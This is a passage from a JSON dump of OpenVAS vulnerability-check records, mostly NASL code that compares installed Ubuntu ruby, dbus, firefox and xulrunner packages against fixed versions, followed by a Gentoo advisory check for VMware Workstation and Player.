ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-elisp\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-examples\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-elisp\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-examples\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8-dbg\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-dev\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9-dbg\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-dev\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.8\", ver:\"1.8.7.72-3ubuntu0.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9\", ver:\"1.9.0.2-9ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-1-doc\", ver:\"1.2.1-5+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-3\", ver:\"1.2.1-5+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-1-utils\", ver:\"1.0.2-1+etch3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus\", ver:\"1.2.1-5+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-dev\", ver:\"1.2.1-5+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-x11\", ver:\"1.2.1-5+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.10.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.10.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser-3.0-branding\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-branding\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.10.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.10.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.10.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-dev\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.8.10.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser-3.0-branding\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-branding\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-dev\", ver:\"1.9.0.12+build1+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:58", "description": "The remote host is missing updates announced in\nadvisory GLSA 200711-23.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200711-23 (vmware-workstation vmware-player)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062", "CVE-2006-3619", "CVE-2007-5617", "CVE-2007-4497", "CVE-2007-4496", "CVE-2006-4146", "CVE-2007-0063", "CVE-2004-0813", "CVE-2006-4600", "CVE-2007-1716", "CVE-2007-0061"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:59243", "href": "http://plugins.openvas.org/nasl.php?oid=59243", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"VMware guest operating systems might be able to execute arbitrary code with\nelevated privileges on the host operating system through multiple flaws.\";\ntag_solution = \"All VMware Workstation users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n'>=app-emulation/vmware-workstation-5.5.5.56455'\n\nAll VMware Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n'>=app-emulation/vmware-player-1.0.5.56455'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200711-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=193196\nhttp://www.gentoo.org/security/en/glsa/glsa-200606-02.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200702-06.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200704-11.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200705-15.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200707-11.xml\nhttp://lists.vmware.com/pipermail/security-announce/2007/000001.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200711-23.\";\n\n \n\nif(description)\n{\n script_id(59243);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0813\", \"CVE-2006-3619\", \"CVE-2006-4146\", \"CVE-2006-4600\", \"CVE-2007-0061\", \"CVE-2007-0062\", \"CVE-2007-0063\", \"CVE-2007-1716\", \"CVE-2007-4496\", \"CVE-2007-4497\", \"CVE-2007-5617\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200711-23 (vmware-workstation vmware-player)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-emulation/vmware-workstation\", unaffected: make_list(\"rge 5.5.5.56455\", \"ge 6.0.1.55017\"), vulnerable: make_list(\"lt 6.0.1.55017\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"app-emulation/vmware-player\", unaffected: make_list(\"rge 1.0.5.56455\", \"ge 2.0.1.55017\"), vulnerable: make_list(\"lt 2.0.1.55017\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:28", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:037.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": 